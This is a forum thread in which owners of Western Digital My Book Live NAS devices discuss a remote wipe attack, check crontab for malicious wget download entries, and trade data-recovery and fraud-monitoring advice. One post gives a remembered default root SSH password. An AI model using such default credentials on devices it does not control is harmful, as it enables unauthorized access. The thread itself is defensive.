Since you mentioned this was a chron job, any thoughts on whether this was an already compromised machine where the commands were scheduled for execution. Could this be sitting on machines now without their knowledge, waiting to be executed?
That is a very good point. I am glad you mentioned it.
I’m thinking everybody should ssh into their Western Digitals and cd to the etc directory and look at their crontab file. One way to do that is type “cat /etc/crontab”.
Basically, when those crontab entries are activated, the files w or wB could end up being anything, doing anything.
The bogus nttpd executable could be doing anything.
So yes definitely. If entries in crontab have wget commands in them, pull your nas from the network pull the plug.
More direct answer, yes, i think its possible that other devices have malware on them.
Cron in my case was causing a periodic download of “w” and “wB”
Haven’t ever ssh’d into my NAS. What credentials should I be using? Admin/router pass?
First ssh has to enabled from web control panel.
Do a google search, im not at a place that i have the info.
By memory i think the ssh user is root and password is welc0me.
This happened to me too in Canada, GUI says a factory reset was preformed on the 23rd. Years of data gone that I stupidly did not backup. That will teach me I guess. Is there any indication at this point that data was stolen from the drives or that the driver were somehow used to gain access to other things on our network? I had tax returns saved on there for the past few years for me and my parents so now I’m super paranoid that my data has been stolen or my computers are vulnerable. I’ve since entirely removed the drive from my network and unplugged it.
Mee too LOL…WD is so stupid…
I tried R-Studio but te vast majority of the data is corrupted
i have identical content - lots of ripped DVD’s i didnt want to drag around - I have read reasonable success with PhotRec for these file types and tried to control mybooklive drive over Ethernet. Doesnt seem possible. I am going to purchase a SATA to USB adaptor and go that way. Has anyone tried this with the Photrec app on large video files and been successful?
After turning ssh on, I logged in via a command line and poked around some. Not seeing anything odd in crontab. Just some daily/weekly/monthly files. Looking in those directories, nothing looks out of place. Files all show older dates. So either my firewall saved me or my older firmware did not contain the exploit.
Got it. Tks
I’m a MBL Duo user from Canada. The device logs show that it rebooted (but did not reset) at 4:04 AM on the 23rd. All of my files are still intact. I didn’t give the notification email about it rebooting any thought because, coincidentally, there was a power outage at 7AM, so it didn’t seem unusual. Strangely, despite the power outage, the logs only show the one reboot at 4AM.
Some details that may be useful to others more knowledgeable about these things:
Firmware Version: 02.43.03-022
Auto Update: Disabled
Remote Access: Enabled (Automatic)
Router UPnP: Enabled
I’ve since disconnected the device from my router (and disabled UPnP). I have a full backup of all important data on an external USB drive, but there are still some files I’d like to get off it. I’ll connect it directly to a laptop to copy those files and take a look at the crontab, which I’ve been using for years to do a nightly rsync to the external USB.
Thank you for your post. Let us k ow if you have complete success. I mailed my WD NAS on Friday and will arrive Monday. That was the best support I had received from western digital was to take it to a recovery company. All data gone from our entire lives until 5 years ago. I hope it works.
Unfortunately I had the same problem 2 days ago. I found also in the user.log the record related to the “factoryRestore.sh: begin script”
I checked my current home network configuration in the internet router:
UPNP = off
NAT/PAT = none
DMZ = yes (My Book Live Duo IP address)
In the My Book Live Duo settings:
Remote Access = Enable not checked
I removed the DMZ configuration in the internet router and blocked My Book Live Duo IP address to prevent the access to Internet. I am now trying to reinstall the My Book Live Duo starting from a fresh factory restore.
One has to wonder why they deleted devices without a ransom. Perhaps it was to cover their tracks somehow? Frankly, since the vulnerability allowed the attackers to run commands on the devices as root, there’s no reason to think data couldn’t have been accessed. If I’m wrong, someone please chime in and correct me.
I hope your tax returns were at least password protected by TurboTax or something like that? Either way, I would set up fraud monitoring if enough sensitive info was potentially released. I hope your data wasn’t accessed, but I also would be proactive if I were you in protecting yourself from potential fraud.
In the end, this hack may be turn out to be worse for some than others depending on what kind of data was on their WD devices.
I’m not really sure how to set up fraud monitoring? I think the only personal info I had on there was a copy of mine and my parents tax returns for the past couple years, and my credit card statements. The credit card I can monitor online for any weird activity. Not sure what to do about a potential breech of our social insurance numbers though. Canadian government website suggests calling one of the credit bureaus to monitor your file so I guess I’ll do that Monday.
Also if anyone has any suggestions for someone not networking inclined to make sure my network is otherwise secure now that I’ve unplugged the MBL, I’d greatly appreciate it.
so i’m one of the lucky ones and found this thread coincidently 2 days ego on reddit… my device is double backed up and everything on it is encrypted so i wasn’t worried and kept it running till this morning… everything on it was disabled including ssh except remote control which i needed… right now it’s running but i disabled remote control and cut of the internet from and to it via modem firewall.
yeah i have a desktop. I shall have a look what connectors are available…
All connected and reconising the drive now the long task of running partition recovery.
(Sorry late recovery got a limit of posts on my first days posting)
i can’t find the UPnP setting on the WD device
This is all I get from
cat /etc/crontab :
MyBookLive:~# cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 0 3 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 10 3 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 20 3 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) #
What other commands should I do from here to see if I’m compromised?